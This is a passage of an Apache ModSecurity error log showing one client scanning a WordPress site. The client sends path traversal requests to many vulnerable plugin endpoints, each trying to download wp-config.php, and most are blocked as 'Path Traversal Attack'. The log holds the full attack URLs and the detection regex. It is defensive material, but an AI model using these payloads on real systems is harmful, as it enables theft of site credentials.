"ZN-wWrCcrCl0jrDdhfxXLAAAAEo"] [Fri Aug 18 12:54:35.025842 2023] [:error] [pid 18873:tid 140103284377344] [client 87.249.132.213:35114] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "ZN-wW7CcrCl0jrDdhfxXLQAAAFE"] [Fri Aug 18 12:54:35.120208 2023] [:error] [pid 19445:tid 140103359911680] [client 87.249.132.213:35116] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-imagezoom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-imagezoom/download.php"] [unique_id "ZN-wW0Wc94tsnIsHAQ-XagAAAMg"] [Fri Aug 18 12:54:35.227876 2023] [:error] [pid 18874:tid 140103491151616] [client 87.249.132.213:35118] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-lytebox/main.php?pg=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-lytebox/main.php"] [unique_id "ZN-wW1xvK4MFoveIP9_KmQAAAIE"] [Fri Aug 18 12:54:35.322076 2023] [:error] [pid 18874:tid 140103284377344] [client 87.249.132.213:35120] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-miniaudioplayer/map_download.php"] [unique_id "ZN-wW1xvK4MFoveIP9_KmgAAAJE"] [Fri Aug 18 12:54:35.416019 2023] [:error] [pid 18874:tid 140103368304384] [client 87.249.132.213:35122] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-mon/assets/download.php?type=octet%2Fstream&path=..%2F..%2F..%2F..%2F&name=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-mon/assets/download.php"] [unique_id "ZN-wW1xvK4MFoveIP9_KmwAAAIc"] [Fri Aug 18 12:54:35.510189 2023] [:error] [pid 18874:tid 140103326340864] [client 87.249.132.213:35124] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-publication-archive/includes/openfile.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-publication-archive/includes/openfile.php"] [unique_id "ZN-wW1xvK4MFoveIP9_KnAAAAIw"] [Fri Aug 18 12:54:35.604413 2023] [:error] [pid 19445:tid 140103465973504] [client 87.249.132.213:35126] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZN-wW0Wc94tsnIsHAQ-XawAAAMQ"] [Fri Aug 18 12:54:35.698895 2023] [:error] [pid 19445:tid 140103309555456] [client 87.249.132.213:35128] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZN-wW0Wc94tsnIsHAQ-XbAAAAM4"] [Fri Aug 18 12:54:35.792929 2023] [:error] [pid 19445:tid 140103250806528] [client 87.249.132.213:35130] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-table/js/wptable-button.phpp"] [unique_id "ZN-wW0Wc94tsnIsHAQ-XbQAAANU"] [Fri Aug 18 12:54:35.887418 2023] [:error] [pid 19445:tid 140103482758912] [client 87.249.132.213:35132] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"] [unique_id "ZN-wW0Wc94tsnIsHAQ-XbgAAAMI"] [Fri Aug 18 12:54:35.982141 2023] [:error] [pid 18873:tid 140103482758912] [client 87.249.132.213:35134] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpeasystats/export.php?homep=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpeasystats/export.php"] [unique_id "ZN-wW7CcrCl0jrDdhfxXLgAAAEI"] [Fri Aug 18 12:54:36.078398 2023] [:error] [pid 18873:tid 140103259199232] [client 87.249.132.213:35136] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "ZN-wXLCcrCl0jrDdhfxXLwAAAFQ"] [Fri Aug 18 12:54:36.174897 2023] [:error] [pid 18873:tid 140103301162752] [client 87.249.132.213:35138] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-forum/mybb/memberlist.php"] [unique_id "ZN-wXLCcrCl0jrDdhfxXMAAAAE8"] [Fri Aug 18 12:54:36.269352 2023] [:error] [pid 18873:tid 140103359911680] [client 87.249.132.213:35140] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php"] [unique_id "ZN-wXLCcrCl0jrDdhfxXMQAAAEg"] [Fri Aug 18 12:54:36.411750 2023] [:error] [pid 19445:tid 140103234021120] [client 87.249.132.213:35142] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Aug 18 12:54:36.411973 2023] [:error] [pid 19445:tid 140103234021120] [client 87.249.132.213:35142] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Aug 18 12:54:36.412116 2023] [:error] [pid 19445:tid 140103234021120] [client 87.249.132.213:35142] PHP Warning: require(ABSPATHWPINC/option.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Aug 18 12:54:36.412282 2023] [:error] [pid 19445:tid 140103234021120] [client 87.249.132.213:35142] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/option.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Aug 18 12:54:36.513385 2023] [:error] [pid 18872:tid 140103457580800] [client 87.249.132.213:35144] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=..%2F..%2F..%2F&filename=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/multi-plugin-installer/mpi_download.php"] [unique_id "ZN-wXPG_rKmCSnA6LxD5eAAAAAU"] [Fri Aug 18 12:54:36.607857 2023] [:error] [pid 19445:tid 140103267591936] [client 87.249.132.213:35146] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-document-embedder/libs/pdf.php"] [unique_id "ZN-wXEWc94tsnIsHAQ-XcAAAANM"] [Fri Aug 18 12:54:36.702214 2023] [:error] [pid 19445:tid 140103225628416] [client 87.249.132.213:35148] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php?fileaway=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php"] [unique_id "ZN-wXEWc94tsnIsHAQ-XcQAAANg"] [Fri Aug 18 12:54:37.530797 2023] [:error] [pid 18872:tid 140103482758912] [client 87.249.132.213:35152] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/document_manager/views/file_download.php?fname=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/document_manager/views/file_download.php"] [unique_id "ZN-wXfG_rKmCSnA6LxD5eQAAAAI"] [Fri Aug 18 12:54:37.647259 2023] [:error] [pid 18873:tid 140103242413824] [client 87.249.132.213:35154] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-manager/views/file_download.php?fname=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-manager/views/file_download.php"] [unique_id "ZN-wXbCcrCl0jrDdhfxXMwAAAFY"] [Fri Aug 18 12:54:37.744466 2023] [:error] [pid 18873:tid 140103368304384] [client 87.249.132.213:35156] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZN-wXbCcrCl0jrDdhfxXNAAAAEc"] [Fri Aug 18 12:54:37.839278 2023] [:error] [pid 18874:tid 140103499544320] [client 87.249.132.213:35160] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php"] [unique_id "ZN-wXVxvK4MFoveIP9_KnQAAAIA"] [Fri Aug 18 12:54:37.943567 2023] [:error] [pid 18872:tid 140103499544320] [client 87.249.132.213:35162] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match 